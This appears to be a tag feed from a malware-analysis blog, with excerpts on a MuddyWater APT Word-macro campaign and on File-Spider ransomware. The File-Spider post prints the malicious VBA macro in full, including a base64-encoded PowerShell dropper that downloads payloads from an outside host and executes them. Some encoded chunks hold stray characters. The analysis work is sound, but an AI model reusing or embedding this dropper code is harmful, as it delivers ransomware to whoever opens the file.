MS Word on Melted in Hex https://meltedinhex.com/tags/ms-word/ Recent content in MS Word on Melted in Hex Melted in Hex https://meltedinhex.com/images/og-social.png https://meltedinhex.com/images/og-social.png Hugo en-us Fri, 11 Jan 2019 22:00:00 +0530 A new MuddyWater APT campaign spreads Backdoor RAT https://meltedinhex.com/posts/a-new-muddywater-apt-campaign-spreads/ Fri, 11 Jan 2019 22:00:00 +0530 https://meltedinhex.com/posts/a-new-muddywater-apt-campaign-spreads/ <p>MuddyWater is an APT group that has been active throughout 2017, targeting victims in the Middle East with in-memory vectors leveraging PowerShell.</p> <p>In October 2018, Kaspersky Lab published a <a href="https://securelist.com/muddywater/88059/">good analysis report</a> on the malware by this APT group.</p> <p>Here I am publishing my analysis report on recent malware by this APT group which targeted several parts of the Middle East.</p> <p>Sample -  8899c0dac9f6bb73ce750ae7b3250dbd (<a href="https://www.virustotal.com/#/file/c873532e009f2fc7d3b111636f3bbaa307465e5a99a7f4386bebff2ef8a37a20/detection">Virustotal</a>)</p> <p>References :</p> <p><a href="https://www.vmray.com/analyses/c873532e009f/report/overview.html">https://www.vmray.com/analyses/c873532e009f/report/overview.html</a></p> <p><a href="https://twitter.com/360TIC/status/1081080752438009856">https://twitter.com/360TIC/status/1081080752438009856</a></p> <p><a href="https://www.virustotal.com/#/file/c873532e009f2fc7d3b111636f3bbaa307465e5a99a7f4386bebff2ef8a37a20/detection">https://www.virustotal.com/#/file/c873532e009f2fc7d3b111636f3bbaa307465e5a99a7f4386bebff2ef8a37a20/detection</a></p> <p><img loading="lazy" src="https://meltedinhex.com/images/a-new-muddywater-apt-campaign-spreads/doc1-85a3eec5.png"></p> <p>The document has obfuscated macro code which contains encrypted binary data. On execution, it decrypts the data, drops files and executes them.</p> Analysis of File-Spider Ransomware https://meltedinhex.com/posts/analysis-of-file-spider-ransomware/ Mon, 11 Dec 2017 23:14:00 +0530 https://meltedinhex.com/posts/analysis-of-file-spider-ransomware/ <p>MD5: de7b31517d5963aefe70860d83ce83b9 [<a href="https://www.virustotal.com/#/file/1753cfa7bec8b6044b07823deee14d9ca366c54b42c1c9d4ff045dac2fc112d9/detection">VirusTotal</a>]<br> FileName: BAYER_CROPSCIENCE_OFFICE_BEOGRAD_93876.doc<br> FileType: MS Word Document</p> <p>The Word file has an embedded macro.<br> When you look into the macro code, you will find the below snippet.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">Private Function decodeBase64(ByVal strData As String) As Byte() </span></span><span class="line"><span class="cl"> Dim objXML As MSXML2.DOMDocument </span></span><span class="line"><span class="cl"> Dim objNode As MSXML2.IXMLDOMElement </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Set objXML = New MSXML2.DOMDocument </span></span><span class="line"><span class="cl"> Set objNode = objXML.createElement(&#34;b64&#34;) </span></span><span class="line"><span class="cl"> objNode.dataType = &#34;bin.base64&#34; </span></span><span class="line"><span class="cl"> objNode.Text = strData </span></span><span class="line"><span class="cl"> decodeBase64 = objNode.nodeTypedValue </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Set objNode = Nothing </span></span><span class="line"><span class="cl"> Set objXML = Nothing </span></span><span class="line"><span class="cl">End Function </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Private Function str() As String </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">str = &#34;cG93ZXJzaGVsbC5leGUgLXdpbmRvd3N0eWxlIGhpZGRlbiAkZGlyID0gW0Vudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnQXBwbGljYXRpb25EYXRhJykgKyAnXFNwaWRlcic7JGVuYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjg7ZnVuY3Rpb24geG9yIHtwYXJhbSgkc3RyaW5nLCAkbWV0aG9kK&#34; </span></span><span class="line"><span class="cl">str = str + &#34;SR4b3JrZXkgPSAkZW5jLkdldEJ5dGVzKCdBbGJlclRJJyk7JHN0cmluZyA9ICRlbmMuR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHN0cmluZykpOyRieXRlU3RyaW5nID0gJGVuYy5HZXRCeXRlcygkc3RyaW5nKTskeG9yZERhdGEgPSAkKGZvciAoJGkgPSAwOyAkaSAtbH&#34; </span></span><span class="line"><span class="cl">str = str + &#34;QgJGJ5dGVTdHJpbmcubGVuZ3RoKXtmb3IoJGogPSAwOyAkaiAtbHQgJHhvcmtleS5sZW5ndGg7ICRqKyspeyRieXRlU3RyaW5nWyRpXSAtYnhvciAkeG9ya2V5WyRqXTskaSsrO2lmKCRpIC1nZSAkYnl0ZVN0cmluZy5MZW5ndGgpeyRqID0gJHhvcmtleS5sZW5ndGh9fX0pOyR4b3JkRGF0YSA9ICRlbmMuR2V&#34; </span></span><span class="line"><span class="cl">str = str + &#34;0 U3RyaW5nKCR4b3JkRGF0YSk7cmV0dXJuICR4b3JkRGF0YX07ZnVuY3Rpb24gZGF0YSB7cGFyYW0oJG1ldGhvZCkkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsgaWYgKCRtZXRob2QgLWVxICdkJyl7JGlucHV0ID0gJHdlYkNsaWVudC5Eb3dubG9hZFN0cmluZygnaHR0cDov&#34; </span></span><span class="line"><span class="cl">str = str + &#34;L3lvdXJqYXZhc2NyaXB0LmNvbS81MTE4NjMxNDc3L2phdmFzY3JpcHQtZGVjLTItMjUtMi5qcycpfWVsc2V7JGlucHV0ID0gJHdlYkNsaWVudC5Eb3dubG9hZFN0cmluZygnaHR0cDovL3lvdXJqYXZhc2NyaXB0LmNvbS81MzEwMzIwMTI3Ny9qYXZhc2NyaXB0LWVuYy0xLTAtOS5qcycpfSRieXRlcyA9IFtDb&#34; </span></span><span class="line"><span class="cl">str = str + &#34;252 ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyggKHhvciAkaW5wdXQgJ2QnKSApO3JldHVybiAgJGJ5dGVzfTtmdW5jdGlvbiBpbyB7cGFyYW0oJG1ldGhvZClpZigkbWV0aG9kIC1lcSAnZCcpeyRmaWxlbmFtZSA9ICRkaXIgKyAnXGRlYy5leGUnfWVsc2V7JGZpbGVuYW1lID0gJGRpciArICdcZW5jLmV4ZSd9W0&#34; </span></span><span class="line"><span class="cl">str = str + &#34;lPLkZpbGVdOjpXcml0ZUFsbEJ5dGVzKCRmaWxlbmFtZSwgKGRhdGEgJG1ldGhvZCkpfTtmdW5jdGlvbiBydW4ge3BhcmFtKCRtZXRob2QpaWYgKCRtZXRob2QgLWVxICdkJyl7aW8gJ2QnOyBIC1GaWxlUGF0aCAoJGRpciArICdcZGVjLmV4ZScpIC1Bcmd1bWVudExpc3QgJ3NwaWRlcid&#34; </span></span><span class="line"><span class="cl">str = str + &#34;9ZWxzZXtpbyAnZSc7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICgkZGlyICsgJ1xlbmMuZXhlJykgLUFyZ3VtZW50TGlzdCAnc3BpZGVyJywgJ2t0bicsICcxMDAnfX07aWYoIFRlc3QtUGF0aCAkZGlyKXt9ZWxzZXttZCAkZGlyOyBydW4gJ2QnOyBydW4gJ2UnIH0=&#34; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">str = StrConv(decodeBase64(str), vbUnicode) </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">End Function </span></span></code></pre></div><p>After Base64 decoding, we will get the following PowerShell script.</p>